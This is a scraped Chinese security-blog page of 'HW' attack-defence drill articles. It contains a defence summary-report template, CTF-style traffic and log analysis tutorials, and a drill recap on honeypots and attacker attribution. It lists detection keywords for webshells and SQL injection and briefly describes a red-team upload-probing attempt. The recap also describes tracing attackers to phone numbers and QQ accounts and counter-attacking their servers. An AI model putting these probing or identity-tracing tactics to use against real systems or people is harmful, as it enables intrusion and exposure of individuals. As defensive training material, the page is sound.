2、加强网络安全设备如VPN、堡垒机等权限管理,对人员进行基于角色划分管理权限。 3、对各平台网络严格按照等级保护要求进行区域区分,加强信息系统安全防护和管理。 4、对数据安全加强防护,防止未授权访问敏感数据,防止技术和业务人员对数据误操作或恶意操作导致数据泄露。 (三)安全监测方面 1、充分利用安全设备及监控平台进行监控。分析安全设备的日志,对应用系统的运行状态、资源占用率等情况进行查看,及时发现和应对攻击行为,根据记录的入侵源IP、攻击类型、攻击访问等特征进行关联分析。 2、增加安全预警手段。推进公司预警监测和态势感知能力,加强主机端安全监控能力,将安全设备及系统逐步进行整合。 (四)应急处置方面 1、建立健全安全预防和预警机制。加强信息网络系统和设备的安全防护工作,加强信息网络日常运行状况的检测分析,对外部和内部可能对信息网络产生重大影响的事件进行预警,保障信息网络安全畅通。 2、加强应急处置和演练。发生突发性事件时,启动应急预案,根据事件级别,根据《XXXXXXXXXX平台应急相应预案》采取相应处置措施,确保网络通畅,业务连续性以及信息安全。有计划、有重点的组织技术人员针对不同情况对预案进行演练,对预案中存在的问题和不足及时补充、完善。  下一步,我司将进一步推进网络安全和信息化工作,进一步用好攻防演练成果,在XX的指导下,提升态势感知和应急处置能力,提高关键信息基础设施防护水平,不断完善网络安全工作体制机制,构建与信息化工作相适应的网络安全保障体系,有力维护XX平台业务及数据安全。 总结实例一 实例的文章来源:极梦C 前言:不打内网。     目标1:两个网站                  www.test1.com (重点企业)         www.test2.com (教育相关)     本来意气风发的打算大干一场,一看到目标傻眼了。两个的网站,放弃。一个重点企业,也没有多少希望,另一个教育网站,看来有点希望。开始吧。 测试开始:     主要测试(test1+test2),一般的网站,要不没人gan测试,很多漏洞。要不就是防护很严密。     正常操作:当时就傻眼了。我发现我的云溪会员是假的吧,都是无。 看看有没有CDN,waf之类的。     Test1 :cloud-waf +CDN     Test2 :cloud-waf +cdn     test3:cloud-waf+CDN 接下来应该找到真实IP。可以绕过CDN和云锁。     一些方法:        DNS历史记录/证书/子域名/邮箱/fofa 最终未果。(一些大厂,一般直接托管,比如这里的一般都是**云上的服务器,再带云锁等防护。查看历史记录解析,很多都是中间经过了很久的时间突然重视了,换服务器上设备。邮箱注册人查询,都是**云的。) Test1: 处处碰壁,这里只有尝试逻辑漏洞。 到这里,就有点无奈。日常手段没有成效。 GooGle语法: 测试上传点:     没有提交按钮。看了一下代码,复制代码,进行本地构造,再更改Host进行上传,返回404。测试失败。       只能继续看我的那几千个数据包。突然发现一个js引起我的注意-ewebeditor.js之类的文件。猜测有ewebeditor编辑器。只不过目录进行了修改。扫描没有扫到。 Test2:     云锁,**云。扫描直接封。放弃扫描。尝试逻辑漏洞 有文件上传点,可惜是**云。每次上传后先上传都**云上。(很恶心) 通过fofa,进行同尝试的ip域名发现。 发现的其中一个ip,每个端口都有一个登陆口,包括堡垒、防火墙等。可以没有爆破成功。 这里尝试云数据平台:...
阅读全文
HW:红队眼中的防守弱点与蓝队应对攻击的常用策略 安全文章

HW:红队眼中的防守弱点与蓝队应对攻击的常用策略

HW:红队眼中的防守弱点与蓝队应对攻击的常用策略▼微信公众号:计算机与网络安全ID:Computer-network一如既往的学习,一如既往的整理,一如即往的分享。感谢支持“如侵权请私聊公众号删文”关注LemonSec觉得不错点个“赞”、“在看”哦 本文始发于微信公众号(LemonSec):HW:红队眼中的防守弱点与蓝队应对攻击的常用策略
阅读全文
2021HW多个总结模版 安全闲碎

2021HW多个总结模版

今天终于结束了2021HW行动,中间的心酸曲折与案例回顾本来想写点,但总结回顾相关文章挺多了,不喜欢重复。从前天开始就有小伙伴已经开始接总结报告了,向我寻求一份模板,毕竟有保密协议,脱敏的道路还是有些累的,所以此文章主要是模板,内容未必真实,帮大家解决最后一公里路程,希望有点帮助——从HW的痛苦中结束,投入到70周年重保的痛苦中去~~~由于每家企业防护手段不一、组织架构不一,并且以下案例未必真实,所以完全照抄的可能性不大,所以仅供参考~~~: 201X年X月X日-201X年X月X日,XX发起了针对关键信息基础设施进行攻防演练的HW工作。XXXX平台作为防守方,成功防御了XX的攻击,没有被攻破,同时发现并处理了XXXX,经XX确认,得分X分。 平台按照XX和XX的统一部署,重预警、早排查,演练期间,加强安全专项巡检,做好相关汇报工作,对发现的安全问题及时整改,按照组织要求认真做好各阶段工作,顺利完成了防守任务,提升了XX平台的网络应急安全应急处置与协调能力,提升了XX平台安全防护水平。 具体情况如下:一、前期准备 1、成立XX平台HW201X工作专项小组,并由公司负责人牵头,各部门协力配合,做到了分工明确,责任具体到人;同时完善相关安全制度优化完成《XXXX平台应急处置方案》和《XX平台防守组工作方案》,保障HW工作正常有序开展。 2、开展运维自检自查工作以及第三方协查工作。通过资产梳理工作,对XX平台网络策略优化xx项,修复高危安全漏洞xx余项,其中自主发现高危安全漏洞xx项,XX协助发现高危漏洞x个,包含在自主发现漏洞中,已做到对高危漏洞清零,检测发现并修复平台弱口令xx项。3、组织防护工作演练,编写《xxXX平台工作部署》方案,对HW期间工作进行紧密部署,加强完善平台安全巡检,增强团队协作能力。 4、组织协调第三方能力,在此期间对物理机房、云服务商监测加强监控、检测要求,XX协助提供x云安全监测服务,并配置入侵检测系统,同时安全部对公司内部进行安全意识宣贯,降低被钓鱼攻击风险。二、组织实施(一)加强组织协调 在公司内部设置专项防守场地,安排XX平台各部门负责人、核心部门驻场值守。安排专人进行对接,随时与防守团队保持联络,通过电话会议每日协商,汇总当日所发生的安全事件,针对安全事件进行应急响应和处置。(二)安排重点值守各部门各司其职,加强防守整改。其中XX部整体把握XX防守情况,负责与总体防守组的沟通联系,负责信息对接,保持随时联络,提交防守成果。XX部负责对网络安全策略进行梳理,删除无效策略;XX部负责对主机系统安全基线进行检查落地,修复主机漏洞,对中间件平台进行升级;XX梳理数据库相应安全权限,对权限进行严格控制;XX部负责对代码层安全漏洞进行修复,并对后台管理进行安全防护;XX部负责撰写整体《安全应急相应方案》以及《HW工作安排部署方案》,加强安全监测预警、安全防护和应急处置能力。(三)开展防守工作攻防实施阶段 1、严格落实值班制度。平台加强了每日巡检力度,从巡检次数从每日二次调整为每日三次,同时安排专人负责安全巡检,对巡检项进行详细记录,并于每日下午X点前上报;并安排专人在部机关值守,确保信息沟通顺畅。 2、认真落实报告制度。安排专人到XX负责联络工作X周,并每日于X点、X点进行工作汇报总结,对攻击手段、封禁IP地址,账号爆破情况进行梳理归纳,发现攻击问题第一时间上报总体防守组。编制X份防守成果报告,经演戏指挥部确认,得分XX分。 3、全面做好检测预警工作。平台对WAF、IDS、以及邮箱、VPN等账户,系统状态、网络状态等进行全方位监控,共发现账户破解、扫描、命令执行、SQL注入等攻击数百次,对异常IP进行及时封禁,共计封禁IPXX余个,未发现攻击成功现象。 4、 加强监控应急处理能力。在平台发现被爆破的账号后,并在第一时间对问题账户进行删除操作;发现并删除恶意木马文件XX个,并阻止该恶意程序运行,上报防守成果,同时优化平台相关服务,关闭木马上传路径。 5、攻防实施阶段XX平台共检测到恶意扫描攻击XX次,平台封禁恶意IP地址XX余个,公司邮箱账户被尝试爆破XX余个,均未成功,XX平台业务账户被尝试暴力破解XX个,成功X个,VPN账号被尝试暴力破解X个,未成功,发现XXXXXXXX公司官网网站有异常IP入侵,发现XX平台、XX平台有异常IP入侵,采取封禁IP措施,对XX平台网站应用系统弱口令问题进行整改。三、威胁汇总及整改情况 演习结束后,根据XX与XX相关要求,对攻防演习工作中发现的问题成果进行梳理,共有X项其中XX平台安全隐患X项,非XX平台安全隐患共X项,通知相关部门进行整改,已经完全整改完毕。(一)XX平台威胁整改情况本次参演的XX平台共被发现X处安全隐患,存在XX问题,目前已全部修复。(二)非目标系统威胁整改情况 本次演习攻击方对演习目标所属公司系统进行了攻击渗透,共发现威胁X个。截止目前,已完成所有问题整改、漏洞修复。四、存在问题(一)XX平台系统此次攻防演习过程中,存在问题如下:    1、基础运维存在薄弱环节....    2、系统存在弱口令问题.....(二)公司存在的问题公司的其他信息系统不在本次攻防演习范围内,故本次演习前准备阶段未对XXX平台、XXX平台进行风险隐患排查和整改加固。 经分析,攻击方主要是通过三种途径开展渗透攻击:一是利用系统已知漏洞,获得系统服务器权限,对内网开展渗透共计;二是利用用户弱口令漏洞,获取网络及信息系统关键信息;三是通过SQL注入、文件上传漏洞等攻击方式,对目标系统开展攻击,获取系统权。根据上述攻击方式,反映出公司存在的问题有:    xxxxxxx......五、下一步工作针对XX平台存在的问题,我司将进一步提高认识,加强人员往来安全意识教育,组织信息安全培训,不断提高全员安全意识。针对上述存在的安全问题整改完成后,举一反三,查找存在类似安全隐患并整改,不断完善网络及信息系统的网络架构规划及制度管理。主要措施如下:(一)基础运维方面 1、加强设备管理,梳理资产信息,严格核对CMDB中信息,将密码变更列入季度安全运维工作,对不在用的策略、服务器进行清理线下,将继续使用的设备进行资产审核,确认资产信息准确性。2、严格杜绝系统弱口令,加强口令强度设置;需要用户注册功能的,要对注册用户加以限制,要对上传文件格式限制;加强信息系统及用户账号的管理,定期查看使用情况,确认不用的系统、用户账号及时进行关停处理。 3、需要对防火墙策略申请、端口映射申请进行周期性梳理,删除无效、无用策略,防止内部服务被误开放到互联网平台。 4、严格控制运维、研发、测试等技术型人员在服务器上明文存储备份账号密码,随意开放查看权限,对离职员工账号密码进行严格审查,删除,关闭。(二)安全防护方面 1、加强公司网络边界防护,更新升级防火墙、防毒墙等安全设备,做好外部入侵防护控制。2、加强网络安全设备如VPN、堡垒机等权限管理,对人员进行基于角色划分管理权限。3、对各平台网络严格按照等级保护要求进行区域区分,加强信息系统安全防护和管理。4、对数据安全加强防护,防止未授权访问敏感数据,防止技术和业务人员对数据误操作或恶意操作导致数据泄露。(三)安全监测方面1、充分利用安全设备及监控平台进行监控。分析安全设备的日志,对应用系统的运行状态、资源占用率等情况进行查看,及时发现和应对攻击行为,根据记录的入侵源IP、攻击类型、攻击访问等特征进行关联分析。2、增加安全预警手段。推进公司预警监测和态势感知能力,加强主机端安全监控能力,将安全设备及系统逐步进行整合。(四)应急处置方面1、建立健全安全预防和预警机制。加强信息网络系统和设备的安全防护工作,加强信息网络日常运行状况的检测分析,对外部和内部可能对信息网络产生重大影响的事件进行预警,保障信息网络安全畅通。2、加强应急处置和演练。发生突发性事件时,启动应急预案,根据事件级别,根据《XXXXXXXXXX平台应急相应预案》采取相应处置措施,确保网络通畅,业务连续性以及信息安全。有计划、有重点的组织技术人员针对不同情况对预案进行演练,对预案中存在的问题和不足及时补充、完善。下一步,我司将进一步推进网络安全和信息化工作,进一步用好攻防演练成果,在XX的指导下,提升态势感知和应急处置能力,提高关键信息基础设施防护水平,不断完善网络安全工作体制机制,构建与信息化工作相适应的网络安全保障体系,有力维护XX平台业务及数据安全。原文地址:https://blog.csdn.net/skystephens/article/details/9819758其他模版获取方法,回复关键词 “00”获取下载地址,请放心使用,已查杀过。关注公众号:HACK之道 本文始发于微信公众号(HACK之道):2021HW多个总结模版
阅读全文
HW防守之流量分析 安全文章

HW防守之流量分析

因为要涉及到流量分析,网上一般很难找到真实的环境流量,这里我们已CTF流量分析题为例。就往年HW来说,防守方除了看监控设备、分析监控报警、分析溯源之外,流量分析在HW中是常用的分析攻击者行为的手段。练练手:第一届 “百度杯” 信息安全攻防总决赛 线上选拔赛:find the flagpacp文件地址:https://static2.ichunqiu.com/icq/resources/fileupload/CTF/BSRC/2017/BSRC3-1/findtheflag.cap■ WEB流量包分析WEB数据包分析的题目主要出现WEB攻击行为的分析上, 典型的WEB攻击行为有:WEB扫描、后台目录爆破、后台账号爆破、WEBSHELL上传、SQL注入等等。■ WEB扫描分析题型:通过给出的流量包获取攻击者使用的WEB扫描工具。解题思路:常见的WEB扫描器有Awvs,Netsparker,Appscan,Webinspect,Rsas(绿盟极光),Nessus,WebReaver,Sqlmap等。要识别攻击者使用的是哪一种扫描器,可通过wireshark筛选扫描器特征来得知。相关命令:http contains “扫描器特征值”。常见的扫描器特征参考:https://www.freebuf.com/column/156291.htm我们在进行流程分析前,一定要先熟悉常见攻击者工具的特征;练练手:安恒八月月赛流量分析:黑客使用的是什么扫描器?pacp文件地址:链接:https://pan.baidu.com/s/1bGEIPeXDCbhybmWOyGr8Og 提取码:q6ro■ 后台目录爆破分析题型:已知攻击者通过目录爆破的手段获取了网站的后台地址,请通过给出的流量包获取后台地址。解题思路:要获取流量包中记录的后台地址,可通过wireshark筛选后台url特征来得知。相关命令:http contains “后台url特征”。常见后台url特征参考:https://www.freebuf.com/column/156291.html练练手:安恒八月月赛流量分析:黑客扫描到的后台登录地址是什么?pacp文件地址:链接:https://pan.baidu.com/s/1bGEIPeXDCbhybmWOyGr8Og 提取码:q6ro■ 后台账号爆破题型:已知攻击者通过暴力破解的手段获取了网站的后台登陆账号,请通过给出的流量包获取正确的账号信息。解题思路:WEB账号登陆页面通常采用post方法请求,要获取流量包中记录的账号信息可通过wireshark筛选出POST请求和账号中的关键字如‘admin’。相关命令:http.request.method==”POST” && http contains == “关键字”练练手:安恒八月月赛流量分析:黑客使用了什么账号密码登录了web后台?pacp文件地址:链接:https://pan.baidu.com/s/1bGEIPeXDCbhybmWOyGr8Og 提取码:q6ro■ WEBSHELL上传题型:已知攻击者上传了恶意webshell文件,请通过给出的流量包还原出攻击者上传的webshll内容。解题思路:Webshell文件上传常采用post方法请求,文件内容常见关键字eval,system,assert要。获取流量包中记录的webshell可通过wireshark筛选出POST请求和关键字.相关命令:http.request.method==”POST” && http contains == “关键字”练练手:安恒八月月赛流量分析:黑客上传的webshell文件名是?内容是什么?pacp文件地址:链接:https://pan.baidu.com/s/1bGEIPeXDCbhybmWOyGr8Og 提取码:q6ro■ USB流量包分析USB流量指的是USB设备接口的流量,攻击者能够通过监听usb接口流量获取键盘敲击键、鼠标移动与点击、存储设备的铭文传输通信、USB无线网卡网络传输内容等等。在CTF中,USB流量分析主要以键盘和鼠标流量为主。■ 键盘流量USB协议数据部分在Leftover Capture Data域中,数据长度为八个字节。其中键盘击键信息集中在第三个字节中。数据如下图所示:如上图所示击键信息为0×05,对应的按键为“B“。具体的键位映射关系可参考:《USB键盘协议中键码》中的HID Usage ID,链接:https://wenku.baidu.com/view/9050c3c3af45b307e971971e.html题型:Flag藏于usb流量中,通过USB协议数据中的键盘键码转换成键位。解题思路:1.使用kali linux中的tshark 命令把cap data提取出来:tshark -r usb.pcap -T fields -e usb.capdata > usbdata.txt,并去除空行。2. 根据《USB键盘协议中键码》中的HID Usage ID将数据还原成键位。练练手:安全评测人员在对某银行卡密码输入系统进行渗透测试,截获了一段通过USB键盘输入6位数字密码的流量,其中也包含了一些其他无关的USB设备的流量,你能从中恢复出6位数字密码吗?最终提交的flag格式为flag。pacp文件地址:链接:https://pan.baidu.com/s/1bGEIPeXDCbhybmWOyGr8Og提取码:q6ropython键盘键码转换脚本:同上■ 鼠标流量USB协议鼠标数据部分在Leftover Capture Data域中,数据长度为四个字节。其中第一个字节代表按键,当取0×00时,代表没有按键、为0×01时,代表按左键,为0×02时,代表当前按键为右键。第二个字节可以看成是一个signed byte类型,其最高位为符号位,当这个值为正时,代表鼠标水平右移多少像素,为负时,代表水平左移多少像素。第三个字节与第二字节类似,代表垂直上下移动的偏移。数据如下图所示:如上图所示数据信息为0×00002000,表示鼠标垂直向上移动20。题型:Flag藏于usb流量中,通过USB协议数据中的鼠标移动轨迹转换成Flag。解题思路:1. 使用kali linux中的tshark 命令把cap data提取出来:tshark -r usb.pcap -T fields -e usb.capdata > usbdata.txt,并去除空行。2. 根据usb协议鼠标数据还原鼠标移动轨迹。练练手:这是一道鼠标流量分析题。pacp文件地址:链接:https://pan.baidu.com/s/1bGEIPeXDCbhybmWOyGr8Og 提取码:q6ropython鼠标数据转换脚本:同上■ 其他流量包分析除了常规的WEB和USB流量外,可能还存在诸如SMTP,Telnet等流量,均与WEB流量分析类似,不再赘述。0×03 总结以上为斗哥了解的流量分析在CTF比赛中的基本题型,欢迎大家补充。参考:https://www.freebuf.com/column/201830.html 本文始发于微信公众号(LemonSec):HW防守之流量分析
阅读全文
HW防守之日志分析 二 安全文章

HW防守之日志分析 二

转载自:https://www.freebuf.com/column/206352.html笔者都是作为CTF解题思路来讲述的日志分析方式,其实在真实的网络攻击中,日志分析方式大同小异,这里引荐笔者的文章。上期为大家介绍了攻击取证之日志分析(一)中的Web日志分析,因此本期将给大家带来系统的日志分析。众所周知,操作系统有很多,但是市面上一般比较主流的操作系统有Windows、Linux以及Mac。其中比较常见的还是Windows以及Linux,Mac毕竟价格有些高昂。在比赛中,系统日志分析的题目更是少之又少,但有时也会结合在一些其他的题目中,因此了解一下也是必要的。接下来,斗哥将从Linux和Windows的系统日志进行讲解。Linux操作系统Linux的系统日志一般存放在/var/log目录下,常见的日志(列举部分)有以下:●  /var/log/messages用于记录系统相关信息,如执行程序、系统错误、启动信息等,一般我们会使用message进行查看可疑程序执行的可疑操作,系统在执行程序时出现错误等,具体日志信息如下:对应的格式:日期 时间 主机 执行的程序:具体信息●  /var/log/boot.log用于记录系统启动信息的日志,一般用于查看在系统启动时所有相关信息,具体如下:不难发现,该日志记录的是系统启动时的启动信息,比如开启了哪些服务、做了什么操作都能一目了然。●  /var/log/lastlog用于记录了用户近期登陆情况,直接查看lastlog,可能信息不太明显,但是也可以使用lastlog命令进行查看,会比较详细:从上图中可以看出,root用户在5月26日23:23:42登陆到终端,IP为192.168.153.1。●  /var/log/cronLinux的计划任务相关信息的日志,我们也会使用它来找寻攻击者可能会写入的一些恶意计划任务,其中可能会带有一些恶意软件等相关信息。斗哥特意在计划中添加了一个flag,通过cron日志我们可以很明显的看到,有个flag,当然在真实环境或者是CTF比赛中,当然不会这么简单,但是基本上我们排查问题思路也是如此。●  /var/log/secure此日志是linux 的安全日志,被用于记录用户工作的安全相关问题以及登陆认证情况,如:不难发现,上面记录了一些服务如polkitd、login、sshd等,无论成功与否,均会被记录到此日志中,有时我们也可以通过它来判断服务器是否被攻击(如暴力破解、调用一些系统方法等),以下举个被爆破之后的日志:可以从上图中很容易发现该服务器正在被IP为192.168.153.167的攻击机在短时间内对root用户进行多次尝试ssh登录。讲完Linux,就得讲一讲Windows了,Windows大家肯定比较熟悉,因为我们现在的笔记本也基本都是Windows操作系统,但是说起查日志,可能还是相对比较少,但在Windows服务器中,日志还是挺关键的,确切的说不管在什么操作系统中,日志都是很重要的。话不多说,开始和大家一起分析分析Windows日志。Windows操作系统Windows日志一般在事件查看器中可以进行查看,通常分为五个:应用程序、安全、Setup、系统、转发事件。并且这五个中又以应用程序、安全以及系统日志较为常见,因此在本期中,将介绍这三个。● 应用程序日志此日志顾名思义便是记录了应用程序的运行情况,包括运行出错、甚至于出错的原因,如:它指出了错误应用程序名称、版本、具体时间错,并且还指出了错误的模块以及异常代码,故而,我们可以通过这些信息,进行对应的故障排查,具体如何排查可通过适当的资料等进行,斗哥在此便不做过多说明,需要提的是它在Windows中保存在Application.evtx文件中,如果在CTF比赛中,看到这个文件,那么可能就是让你进行应用程序日志分析了。● 安全日志此处的安全日志和Linux的安全日志相似,但是它只记录用户登陆情况、用户访问时间以及访问是否授权等,通过它我们可以轻松的发现是否存在爆破风险(一般在短时间内发现大量登陆失败,即可认为该账号被爆破了)。上图显示的是正常的日志,并且它所给的信息也非常详细(以一个登陆失败为例)。它详细到可以发现使用者信息、登陆类型、登陆失败的账户、失败信息、进程信息、内网信息以及详细身份验证信息等,十分方便。它在操作系统中保存在Security.evtx文件下,我们也可以通过双击它打开安全日志。● 系统日志系统日志则是记录了操作系统安装的应用程序软件相关的事件。它包括了错误、警告及任何应用程序需要报告的信息等。相比于Linux 的日志,Windows对于系统日志的记录,也是挺详细的,我们可以通过它来进行一些分析判断,它存在于System.evtx文件中。本期小结本期的日志分析就介绍到此,主要为系统日志分析,这在分析取证中还是蛮重要的。 本文始发于微信公众号(LemonSec):HW防守之日志分析 二
阅读全文
HW平安夜 09/23 2020HW总结 安全文章

HW平安夜 09/23 2020HW总结

01 HW日记—HW日记2020年9月24日  周四  大雨+雷电黄色预警(这个城市,每天都是一场雨~)嗯,很适合养肤~(因为天气雷同,不得不出现日记的雷同)HW进入倒计时阶段,还有0天!。。。。昨天分享了HW报告模板,希望各位用的上吧=HW平安夜 09/23 HW总结模板今年的总结很难写,因为防守方改变了往年的被动防守的方式。以被动变主动的方式,打乱了我过去用了三年的防守报告总结模板。。。防守方联合作战更是让攻击队伍IP资源匮乏,史无前例大团结。防守方独特的溯源方式,让攻击者在本来就小的安全圈无处可藏。====最高端的黑客,往往采用最朴素的溯源方式。====防守方:这个人你认识不?微信,手机号多少?·攻击方小心翼翼,不用扫描器、不用脚本、重装电脑、清浏览器缓存、访问下网站判断是蜜罐立马就撤离,仿佛人间蒸发一般的招数。今年的HW真的是对攻击技术与防守溯源技术的考验,同时也是一个技术等级的筛选。没有往年的热闹,没有大流量扫描、没有ip池狂轰乱炸,一切似乎都在微妙中发生变化~1.2.3.以上来自朋友的对话,对于你们的无奈我只能摘抄我打油诗的句子:愿你有一天,从攻击转防守,从钓鱼转溯源。愿有一天,我们再次相见,是战友,而非敌人。”同时也有多家单位被打惨,不得不说,攻击技术与防守技术都在进度,而HW更是推动这个安全行业技术的快速发展。02 2020HW总结—今年HW特点我个人总结如下:1.人才需要加大···人才需求的加大:常态化地网络安全实战攻防演练,必将导致人才饥荒、人才培养机制改革以及安全服务运营模式的改革,高质量的安全人才非常重要,没质量的不应该太过浮躁。2.安全产品安全性的考验···安全产品漏洞发现与处置:HW中多家安全设备报0day漏洞,一些安全设备出现问题相当于致命性问题,可能造成攻击队伍直接进入企业内网。同时,这也给安全厂商带来了技术的挑战性。在每年HW0day的考验下,安全产品的问题将会得到很大的改进。某活动防守方的感受:不买安全设备就不会被黑3.蜜罐的普及···蜜罐的推广与部署:蜜罐在今年被广泛应用于外网,并成功抓取到攻击队伍指纹信息,并结合溯源技术成功溯源到了个人,攻击者的过去与现在😶蜜罐的普及终会成为一个趋势,不仅是hw时的应用,而且作为长期安全设备应用于企业防护中。蜜罐的长期部署可以提前捕获长期盯着企业业务的一些apt组织,可通过主动手段提前发现潜在威胁。蜜罐可用于长期安全设备,部署在外网,通过扫描探测可以提前发现攻击行为,通过指纹抓取可以定位到攻击者信息。部署在内网,在边界失守的情况下,内网蜜罐可提前发现攻击者的内网探测行为,利用自身所带漏洞引诱并拖延攻击者的内网横向行为,并抓取攻击者信息使溯源到攻击者身份。同时蜜罐的普及使用,也是对蜜罐安全性以及仿真性的考验。攻击队伍在不停的鞭策着安全厂商的成长,今年蜜罐的仿真程度与捕获指纹的方式未必还能适应用明年,攻击队伍会根据蜜罐特征识别出蜜罐。这就需要蜜罐要不断更新策略隐藏特征并且研发新的功能获取攻击者指纹信息。在抓取攻击者的同时,也不要忘了自身产品安全。4.溯源技术的普及···溯源技术不仅仅来源蜜罐的捕获,攻击者的钓鱼邮件、恶意程序、社工、payload带vps等都可能成为我们追踪溯源的手段。这就需要我们利用技术手段多渠道的获取攻击者信息。攻击溯源的技术手段,主要包括ip定位、ID定位与攻击者定位。通过ip可定位攻击者所在位置,以及通过ip反查域名等手段,查询域名的注册信息,域名注册人及邮箱等信息。通过ID定位可获取攻击者常用的网络ID,查询攻击者使用同类ID注册过的微博或者博客、论坛等网站,通过对网络ID注册以及使用情况的查询,定位攻击者所在公司、手机号、邮箱、QQ等信息。或通过其他手段定位攻击者,如反制攻击者vps,获取攻击者vps中的敏感信息、反钓鱼、恶意程序分析溯源等手段。攻击方改变了往年无所顾忌的使用ip池不断扫描的方式;防守方改变了往年的被动防守,开始主动出击,蜜罐出彩,溯源技术普及;攻防不对等的局势逐渐转变;期待明年~HW平安夜: 09/12 漏洞PAYlOADHW平安夜: 09/14 漏洞PAYlOADHW平安夜: 09/15  红队渗透手册之弹药篇HW平安夜: 09/17 红队手册之代理转发与隧道HW平安夜 09/18 新一轮的踩点(一)HW平安夜 09/19 攻击溯源HW平安夜 09/20 前一阶段漏洞情报总结HW平安夜 09/21 死磕到底HW平安夜 09/22 风平浪静蜜罐打油诗-死磕到底HW平安夜 09/23 HW总结模板扫描关注LemonSec 本文始发于微信公众号(LemonSec):HW平安夜 09/23 2020HW总结
阅读全文
HW防守中之日志分析 安全文章

HW防守中之日志分析

CTF-MISC-日志分析没有结合攻击中的真实环境案例,只是看到了一篇关于CTF-MISC-日志分析的文章,与HW中我们要结合日志分析溯源漏洞很贴合。而且作者在对日志分析总结的很细,很实用,搬运过来推荐下。总结——用于备忘和交流学习一.web日志分析(一)、特征字符分析1.sql注入有以上信息可以尝试判断是否为sql注入 (二)、访问频率分析二.系统日志分析(一)、Linux(二)、Windows三.练习题题目来源:墨者学院1.分析谷歌爬虫IP先标记404,观察到其密集存在于210.185.192.212这个IP,再同时标记上这个IP,确实是一直在爬取网站的图片。输入IP即得到key。我最先使用的是notepad++,后来想到用excal按空格分列显示,可以更直观和方便。2.分析sql注入1筛选相应的关键词如union、select等,或者筛选可能存在的sql.php这样的关键词(实际中不可能出现)关键字:union all select3.分析sql注入2有两个文件:系统日志文件和sql日志文件先分析sql文件,搜索sql相关语句,我搜索的是admin,还有order by、information_schema,union、table_name、and1=2、and 1=1即可再根据这条命令对应的时间,在系统日志中匹配IP地址就可得到key4.中断web业务的IP根据http的状态码,500为web服务中断,直接搜索字符串500,找到在此之前有什么post之类的导致系统不能提供服务,得到key5.境外IP攻击分析背景:某网站遭到境外ip攻击,请通过log,找到找到访问news.html最多的境外IP地址筛选访问了news.html的所有IP地址,发现很多404的界面,猜测存在注入,根据其次数大小进行尝试,找到目的IP。其实看IP的组成都能分析出137开头的IP为境外IP在分析境外IP的时候还应该注意时区和时差6.更改管理员的密码背景:某公司安全工程师发现公司有黑客入侵的痕迹,并更改了admin账户的密码,你能帮忙找一下更改admin账户密码的IP地址吗?先对sql的日志搜索update,在16:37:06时出现的修改对应时间查找日志7.拖库溯源直接在sql日志里搜索“select *”,得到明显拖库痕迹作者:Yilanere链接:https://www.jianshu.com/p/bb5b4c31f4f5 本文始发于微信公众号(LemonSec):HW防守中之日志分析
阅读全文